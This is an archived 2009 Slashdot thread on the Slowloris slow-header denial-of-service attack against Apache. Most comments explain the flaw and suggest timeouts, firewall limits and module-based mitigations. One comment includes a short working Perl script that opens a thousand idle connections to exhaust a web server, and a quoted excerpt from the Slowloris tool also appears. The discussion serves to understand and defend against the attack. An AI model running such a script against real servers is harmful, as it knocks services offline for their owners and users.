Follow Slashdot stories on Twitter

 



Forgot your password?
typodupeerror
×
Security The Internet

Attack On a Significant Flaw In Apache Released 203

Zerimar points out a significant flaw in Apache that can lead to a fairly trivial DoS attack is in the wild. Apache 1.x, 2.x, dhttpd, GoAhead WebServer, and Squid are confirmed vulnerable, while IIS6.0, IIS7.0, and lighttpd are confirmed not vulnerable. As of this writing, Apache Foundation does not have a patch available. From Rsnake's introduction to the attack tool: "In considering the ramifications of a slow denial of service attack against particular services, rather than flooding networks, a concept emerged that would allow a single machine to take down another machine's web server with minimal bandwidth and side effects on unrelated services and ports. The ideal situation for many denial of service attacks is where all other services remain intact but the webserver itself is completely inaccessible. Slowloris was born from this concept, and is therefore relatively very stealthy compared to most flooding tools."
This discussion has been archived. No new comments can be posted.

Attack On a Significant Flaw In Apache Released

Comments Filter:
  • by santax ( 1541065 ) on Friday June 19, 2009 @09:22AM (#28389621)
    be prepared to feel the slashdot-effect yourself for once!
  • by Anonymous Coward
    Opera Unite?
  • by Rogerborg ( 306625 ) on Friday June 19, 2009 @09:28AM (#28389703) Homepage

    It's just holding sockets open; that's the "Hello, world!" of DOS attacks.

    I'm finding it hard to believe that Apache is genuinely vulnerable to this. Did nobody see it coming? For real?

    • Re: (Score:3, Informative)

      by Lord Ender ( 156273 )

      No, it's not. It's holding an HTTP session open. That is not the same thing as a TCP socket.

    • This type is already known as "attack by a 1000 snails" type attack. It is harder to defned against than you would think. A user can be slow, but coders are hesitant to drop users that ar too slow or too fast.

      A user kan just keep the TCP/IP alive by sending one byte every x seconds. If this is patched at http header level, you will see you can do the same kind of attack on the application, that can have limited php or perl sessions.

    • Re: (Score:3, Interesting)

      by suso ( 153703 ) *

      Yes, I agree. I've seen a handful of attacks like this over the years. Maybe not exactly this one, but Apache has been vulnerable to this for years and I thought all webservers were. And I thought people just knew about it already. This one is a tough one to fix, its not like Apache can just patch something. It sounds like an architectural change is needed.

  • Why not IIS? (Score:4, Interesting)

    by MBCook ( 132727 ) <foobarsoft@foobarsoft.com> on Friday June 19, 2009 @09:29AM (#28389711) Homepage

    Why isn't IIS vulnerable? Does it just assume the headers are done after some amount of time? Does it have a limit to the number of headers it accepts?

    Can this even be fixed without technically breaking the protocol (since it sounds like what's going on is correct behavior, theoretically)?

    • Re: (Score:3, Interesting)

      What I'm thinking, is this basically another time where those not vulnerable were actually not respecting the spec?
      • Re:Why not IIS? (Score:5, Insightful)

        by Malc ( 1751 ) on Friday June 19, 2009 @10:08AM (#28390307)

        Does the HTTP spec say anything about the server application timing out the connection? Seems like reasonable behaviour to me. I would be surprised if this isn't a configurable option in Apache too.

        People love to hate it, but IIS has matured in to a very good web server. It's my choice over Apache.

    • by Opportunist ( 166417 ) on Friday June 19, 2009 @09:51AM (#28390041)

      If the vulnerability is based on correct, standard conform behaviour of the server, I can see why IIS isn't susceptible to it.

      • Re: (Score:2, Informative)

        by Anonymous Coward

        More likely IIS survives because it uses a worker pool threading model (no thread/process is dedicated to a connection, so a connection only takes up memory for the state, not for the thread).

        Apache had, and probably still has, a process/thread-per-connection model.

        So with all due respect, it looks like a proper design decision is what is protecting IIS here:
        http://www.kegel.com/c10k.html
        http://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/a63ee1c2-04d6-44dc-b4d6-678eb3117bf9.mspx?mfr=

      • Is it really correct and standard to hold a session open for a client that isn't sending any data, while excluding other clients in the process? Where in the spec does it say to do that?

      • I might subscribe to your theory if it weren't for the fact that lighttpd [lighttpd.net], which is a first-rate open-source web server, is explicitly listed as not vulnerable.

    • Re:Why not IIS? (Score:5, Informative)

      by Amouth ( 879122 ) on Friday June 19, 2009 @10:03AM (#28390209)

      unless you are using Session()'s in asp in IIS then one thread in IIS handles multiple connections.

      what this is doing is opening a connection (getting a thread to work it) and holding it open (keeping the thread busy) and just keep asking for new ones.

      it is very common (always i think) for Apache and allot of web servers to have a max thread's so that the site under heavy traffic doesn't open more connections than it can handle.

      where IIS also has a worker thread limit - there is no limit *(you can set one - but not on by default) on how many concurrent connections can be managed by a thread (and new incoming connections are passed to the thread with the lowest current work load - not always the one with less connections)..

      if you do what they are doing here i can see IIS behavior would be to slowly pile all these slow - no work connections into one thread and the others would happily go about doing actual work..

      where apache would slowly lose access to workable threads as this keeps them busy.

      this isn't an exploit on the http or tcp protocol - it is an exploit based on the behavior of the web server based on it's best practices for managing it.

      • by MBCook ( 132727 )

        Makes sense.

        But wouldn't you run into the connection limit of the OS at some point? Or is that just way too high to be a practical problem (say 16 million)?

        • by Amouth ( 879122 )

          well the connection limit for a single host is the number of available ports for outbound traffic (to return data to the client)

          by default (from memory here) i want to say IIS is set up to use ~4k ports for outbound - i do know that can be changed to allow ports 1024+ to be used meaning the number of avaliable ports would be ~64.5k

          and that is per host ip - and unless you have the site bound to a specific host ip address (instead of using site headers - iis will respond on an alternate ip (if it has one) whe

          • unless you have the site bound to a specific host ip address (instead of using site headers - iis will respond on an alternate ip (if it has one) when another is out of ports

            How would that be of any use? The client on the far end is directing incoming traffic based on source IP (among other characteristics). TCP packets that arrive from random IPs are discarded.

            • by Amouth ( 879122 )

              the incoming traffic is always going to IP:80

              the return traffic from IIS is going coming from avaliable Ips':port

              if you bind a website in IIS to an ip instead of "any avaliable ip" then the return tcp connection is forced to be sorced from the ip that is also the reciving

              if you have it set to "any avaliable ip" and the box has 2 ip's your client may request data on IPA:80 and get a reply from IPB:port

              there for your avaliable ports for reply (limiting the max connection's) would be MaxPorts* Available IP's.

              g

              • Re:Why not IIS? (Score:4, Informative)

                by raju1kabir ( 251972 ) on Friday June 19, 2009 @11:34AM (#28391487) Homepage

                if you have it set to "any avaliable ip" and the box has 2 ip's your client may request data on IPA:80 and get a reply from IPB:port

                If a client sends a SYN to 10.1.1.1:80 and gets an SYN-ACK from 10.5.5.5:80 then the client will not associate the two as being related, and will keep waiting for a response from 10.1.1.1:80 until timing out.

                You would need to have some sort of DNS arrangement that encouraged clients to make their requests to your various IPs. You can't just respond from a different IP than the client contacted.

          • well the connection limit for a single host is the number of available ports for outbound traffic (to return data to the client)

            A TCP connection is identified by the source IP:port and destination IP:port. Your web server typically will listen on only one port (80) and probably on a single IP, and TCP has 64k ports available. So, the theoretical limit is 64k connections from each and every computer with a routable IP address. Which is completely insane, so what really matters are the limits your OS puts on how many open sockets/file descriptors there can be (per process, or across the entire system), and if that's high enough then t

            • A TCP connection is identified by the source IP:port and destination IP:port. Your web server typically will listen on only one port (80) and probably on a single IP, and TCP has 64k ports available. So, the theoretical limit is 64k connections from each and every computer with a routable IP address.

              Not really. Yes, the server application listens at a specific IP:port - typically 80 in case of HTTP. However, when you accept() a client connection on the socket you're listening on, you get a new socket for that connection, which is associated with a new, unique port on the server. So you can only have as many client connections on the server as you have ports.

    • by Bemopolis ( 698691 ) on Friday June 19, 2009 @11:09AM (#28391121)

      Why isn't IIS vulnerable

      My guess is that the DoS attack is so slow that, by the time it would have completed, the server has already crashed for a different reason.

    • Doesn't IIS leave sessions "half open" generally? Some kind of IE accelerator trick? Or did they stop doing that?
  • Boring (Score:5, Insightful)

    by Anonymous Coward on Friday June 19, 2009 @09:29AM (#28389719)
    Talk about a boring exploit: no chance for expanding the attack into anything other than a DOS, and if it becomes widespread enough, fairly trivial to fix... (just kill the oldest waiting client that does not have a full header when the last client is taken.) I'd be embarrassed to publish something like this....
    • Surely it's far more embarrassing for the person on the receiving end of the attack.
    • I'd be embarrassed to publish something like this....

      Says the Anonymous Coward

    • fairly trivial to fix ...
      I'd be embarrassed to publish something like this

      So why isn't it fixed? Let me guess: it's a case of all of the Apache developers saying "you have access to the code, you fix it, it's trivial."

  • iptables helps (Score:5, Informative)

    by samjam ( 256347 ) on Friday June 19, 2009 @09:30AM (#28389733) Homepage Journal

    You can have perlbal or any reverse proxy on the same machine but listening on a different port and then use iptables to redirect like this

    # iptables -t nat -A -PREROUTING -d ! 127.0.0.1 -p tcp -m tcp --dport 8080 -j REDIRECT --to-ports 80

    and then you don't need to change your apache configuration - and having apache listen on a different port to what users see can break some scripted sites if they read the port number from the apache config.

  • by Z00L00K ( 682162 ) on Friday June 19, 2009 @09:30AM (#28389737) Homepage Journal

    And the only resolution right now that I can see is to have a connection timeout.

    At least the problem is a denial of service problem and not a problem with intrusion so the damage is easily rectified - restart the web server. Not that you really want to restart it.

    And I suspect that other services can be vulnerable to this type of attack too, not only web servers.

    • the damage is easily rectified - restart the web server

      And you get raped again as soon as it comes back up. How does restarting it help?

      • It will take some time to ramp up the used connections again (assuming that, as the article states, this exploit is fairly slow). While certainly not a real fix, this could be an effective temporary solution until a better solution is available.
        • by micheas ( 231635 )

          Fairly slow has been under a minute on most of the servers I tested it on.

          Fortunately my servers are configured to be able to run either lighttpd or apache. (in case I have a problem with one.)

          So I can pick my poison.

    • Re: (Score:3, Interesting)

      by sjames ( 1099 )

      A connection timeout should be fine. Just start the clock upon accept(). Give the client a generous but limited amount of time to send headers. If the timer expires before the empty line is received, close the connection.

      Bonus points for not getting the thread pool involved until the header is complete.

      Extra credit for a config option to send a flood of junk to the client and THEN close the socket. That could make attackers considerably more visible to their upstream provider.

      • Re: (Score:3, Interesting)

        by sjames ( 1099 )

        Nothing like replyoing to yourself.

        Double extra credit if the junk you send back looks enough like downloading music that the RIAA accidentally joins the forces of good and comes down on the attacker due to ISP snooping but not enough like downloaded music to get you actually busted.

    • the damage is easily rectified - restart the web server

      Good idea, mitigate a DoS attack by taking the server offline.

  • Could you potentially get around this if you're proxying to another web server, say lighttpd or Mongrel, or will this just blanketly affected Apache if you have it in front? I'm gathering the latter from the article:

    At the moment I'm not sure what can be done in Apache's configuration to prevent this attack - increasing MaxClients will just increase requirements for the attacker as well but will not protect the server completely. One of our readers, Tomasz Miklas said that he was able to prevent the attack

    • Re:[Sounds Stupid] (Score:3, Interesting)

      by segedunum ( 883035 )
      Having read this more this just strikes me as incredibly stupid. Did they publish this? Surely we're just talking about a timeout implementation here where the web server will say "Ahhhh, well you didn't complete that header, bye, bye"?
      • How long would you set the timeout?

        Let's say it's 3 seconds (if you want to support crappy dialup connections from South Africa, that sounds about right). That means that an attacker can block out your server for 3 seconds... at a time. As soon as you kill his connections, he just recreates them anew. Or, better yet, determines your timeout, and then disconnects just before your server would drop the connection (so that the logs look more benign).

    • Re: (Score:2, Informative)

      by natbudin ( 577028 )
      I just tried it against nginx 0.6.37. The attack appears to work there as well.
  • Possible work-around (Score:4, Interesting)

    by Norsefire ( 1494323 ) * on Friday June 19, 2009 @09:35AM (#28389809) Journal
    From the source:

    if ( $delay < 166 ) {
    print <<EOSUCKS2BU;
    Since the timeout ended up being so small ($delay seconds) and it generally
    takes between 200-500 threads for most servers and assuming any latency at
    all... you might have trouble using Slowloris against this target. You can
    tweak the -tcpto flag down to 1 second but it still may not build the sockets
    in time.
    EOSUCKS2BU
    }

    Lower Apache's timeout to below 166 seconds.

  • by possible ( 123857 ) on Friday June 19, 2009 @09:39AM (#28389877)

    OpenBSD's pf [openbsd.org] firewall has some options that can help mitigate the "single attacker, single source IP" version of this attack. Of course if the attackers decide to spread the attack out over multiple source IPs like a DDoS, this becomes much harder to deal with until Apache has a patch.

    Filter rules that create state entries can specify various options to control the behavior of the resulting state entry. The following options are available:

    max number
    Limit the maximum number of state entries the rule can create to
    number.
    If the maximum is reached, packets that would normally create state
    fail to match this rule until the number of existing states decreases
    below the limit.
    no state
    Prevents the rule from automatically creating a state entry.
    source-track
    This option enables the tracking of number of states created per
    source IP address.

    The total number of source IP addresses tracked globally can be
    controlled via the

    src-nodes runtime option [slashdot.org].

    max-src-nodes number
    When the source-track option is used,
    max-src-nodes will limit the number of source IP addresses that
    can simultaneously create state.
    This option can only be used with source-track rule.
    max-src-states number
    When the source-track option is used,
    max-src-states will limit the number of simultaneous state
    entries that can be created per source IP address.
    The scope of this limit (i.e., states created by this rule only or
    states created by all rules that use source-track) is dependent
    on the source-track option specified.
  • by cjb-nc ( 887319 ) on Friday June 19, 2009 @09:47AM (#28389991)
    Obviously need to verify this, but we already run mod_cband [sourceforge.net] with a per-IP connection limit of 5. This is in place to stop the over-zealous "download accelerators" from taking all our connections and DOS'ing us. I expect it would stop a single attacker using this attack, but we'd still be vulnerable to a concerted attack by MaxChildren/5 IPs.
    • Re: (Score:2, Informative)

      by id ( 11164 )

      mod_cband has been tested and doesn't have any effect.

  • by moon3 ( 1530265 ) on Friday June 19, 2009 @09:51AM (#28390057)
    If you keep lingerers for more then 160 seconds then no wonder this is possible.

    It should be non-issues on better designed servers that keep an eye on connections anyway. Any single IP spawning lots of unfinished connections gets flagged fast and remembered for the future, so it will get limited access and bandwidth, marked as abuser etc. This is serving 101.
  • by Anonymous Coward on Friday June 19, 2009 @09:53AM (#28390091)

    http://httpd.apache.org/docs/2.2/mod/core.html#timeout

    The issue is that the default configuration waits 5 minutes for the full request, which is painfully to long a period of time. Drop that from 300 to 5, and the "attack" goes away. If you are running the default Apache config in production, you shouldn't be.

    • by ID000001 ( 753578 ) on Friday June 19, 2009 @10:18AM (#28390433)

      http://httpd.apache.org/docs/2.2/mod/core.html#timeout

      The issue is that the default configuration waits 5 minutes for the full request, which is painfully to long a period of time. Drop that from 300 to 5, and the "attack" goes away. If you are running the default Apache config in production, you shouldn't be.

      seem like a potential fix, can anyone confirm?

      • Wouldn't this also affect file uploading? I'm not sure, but I think those are sent as part of the HTTP header.

      • Re: (Score:3, Informative)

        by Anonymous Coward
        Th work-around works fine.

        I downloaded the Slowloris and was able to take down a default apache install, however with keepalive disabled and a timeout of 5, the attack became inneffective.

        This may be a problem for sites with users that do long-running POSTs, but since we don't have any of those, all I can say is "It works here . . . "

        For more info: http://httpd.apache.org/docs/trunk/misc/security_tips.html [apache.org]
    • Re: (Score:3, Insightful)

      by TheLinuxSRC ( 683475 ) *
      From the article:

      "...the server will open the connection and wait for the complete header to be received. However, the client (the DoS tool) will not send it and will instead keep sending bogus header lines which will keep the connection allocated."

      In other words.. the connection is not allowed to "timeout" as there is (bogus) traffic on the connection.
    • Re: (Score:3, Insightful)

      by dlgeek ( 1065796 )
      The problem with that is it will break nontrivial uploads using POST since they won't complete in 5 seconds. The real solution is to not count threads or connections below a certain utilization threashold towards the capped max and kill them once you hit real starvation.
      • by myz24 ( 256948 )

        Did you read the doc? Seems like they thought of that situation. Here is the info

        The total amount of time it takes to receive a GET request.
        The amount of time between receipt of TCP packets on a POST or PUT request.
        The amount of time between ACKs on transmissions of TCP packets in responses.

    • If you are running the default Apache config in production, you shouldn't be.

      That's one of the most damning things you can say about a package.

  • by greed ( 112493 ) on Friday June 19, 2009 @09:54AM (#28390101)

    HTTP 1.1 [rfc-editor.org] specifies a status code for "Request Timeout" (408) and "Gateway Timeout" (504).

    What is needed, therefore, is a timer running for receiving the complete header, and a second one for accepting the body. The timer for the body can be controlled by the type of request and the Content-Length header. (With, of course, a specific cap.)

    Currently, Apache 2.2 [apache.org] has a single timeout value for all types of requests, but it is interpreted differently for the different types.

    If your server only handles GETs, the obvious thing is to crank that number down. Unfortunately, for PUTs, the TimeOut value affects inter-packet time in the request, not overall request time.

    Strangely, the timeout doesn't seem to run in 2.2.10 and 2.2.11 before data is received. Oh dear. That's an even simpler DoS.

    #!/usr/bin/env perl

    use IO::Socket::INET;
    use strict;
    use constant DEFAULT_PORT => "http";

    MAIN: {
    if(@ARGV<1 or @ARGV>2) {
    die "Usage: $0 host [port]\n";
    }
    my($host)=shift;
    my($port)=@ARGV?shift:DEFAULT_PORT;

    my(@sockets);

    for(my $cnt=0;$cnt<1000;++$cnt) {
    my $socket=new IO::Socket::INET(PeerAddr=>$host,
    PeerPort=>$port,
    Proto=>"tcp");
    unless(defined($socket)) {
    die "Cannot create socket to $host:$port--$!\n";
    }
    $socket->print("\r\n");
    push(@sockets,$socket);
    print " Have ".@sockets." open.\n";
    }
    }

    Not quite as stealthy, though. At least as above.

    • by greed ( 112493 ) on Friday June 19, 2009 @10:48AM (#28390823)

      BTW, is there a self-mod value for "I'm not sure I should have posted that"?

    • That's informative, but I thought the point about GET vs. POST and PUT was confusing.

      To be clear, the Timeout directive can be set low without affecting the ability of people to upload large files to the server. Timeout only applies to the time between packets, which should be a few hundred milliseconds apart under most circumstances, right?

      From the httpd manual:

      The TimeOut directive currently defines the amount of time Apache will wait for three things:

      1. The total amount of time it t

    • by Covener ( 32114 )

      Maybe you're on an OS with a dataready or HTTP accept filter. Timeout applies to reading the entire first line of the request.

  • mitigate it somewhat:

    In httpd.conf

    #
    # Timeout: The number of seconds before receives and sends time out.
    #
    Timeout 120

    Unless of course this timeout is for after the header is received only... which I don't think it is... but as they say... assumption is the mother of all f*ckups.

  • ...of one of the 14 year olds who uses this, as she runs the script.

    "Dodge this." ;)

  • Sendmail and other servers are probably vulnerable to this kind of thing. And it is not necessarily the server application itself may not be where the core of the server slowdown occurs. For example, if one were to spread this kind of attack across several different types of TCP-based protocols (SMTP/SMTPS, IMAP(S), HTTP(S), DNS(tcp version), etc then the operating system's TCP engine might start suffer from too many TCP control blocks. (And it isn't just the memory occupied - some silly implementation m

    • by AaronW ( 33736 )

      My mail server (Postfix) actually takes advantage of this. I have it configured to tarpit known spam sources (from RBL) and hold the connections open without sending a response.

    • by Akatosh ( 80189 )

      Oh, sendmail isn't probably 'vulnerable', it definitely is. That's why sendmail has FEATURE(`conncontrol', ,`terminate'), to limit simultaneous sessions per client. Spammers have been abusing it for eons. I put vulnerable in quotes because that feature is configurable, but not a default. If your daemon doesn't have a way of dealing with these things (apache does with a module), there's always

      iptables -A INPUT -p tcp --syn --dport 80 -m connlimit --connlimit-above 10 -j DROP

  • by Megane ( 129182 ) on Friday June 19, 2009 @12:21PM (#28392111)

    If you're going to post links to isc.sans.org, can you please post links to the specific article, and not just the main page?

    Here is the link to the specific article: http://isc.sans.org/diary.html?storyid=6601 [sans.org]

  • Queuing and timeout (Score:2, Informative)

    by pdxp ( 1213906 )
    IIS worker processes have a request queue. Whether or not you use asynchronous functions to handle requests, there is a fixed maximum number of threads each worker process will run to process requests. While reading from a socket, the worker thread does block but more threads are not spawned to handle connections. Instead, the worker process puts new requests into a queue until more threads are available.

    I believe this works because there is a timeout associated with the completion of a request. Sure, it
    • by rgviza ( 1303161 )

      On Apache the request timeout directive is TimeOut.

      It does not impact the response timeout. In my tests setting it to 2 seconds broke the tool but did not break normal POSTs and GETs. I saw no lag even with Slowloris running against the server.

      Setting it to 5 seconds caused noticeable lag for a browser request.

      This will probably work with busy servers but the lag times will be much longer. The directive only affects how long the server will wait _after the request stream starts_. Your browser will wait for

If all else fails, lower your standards.

Working...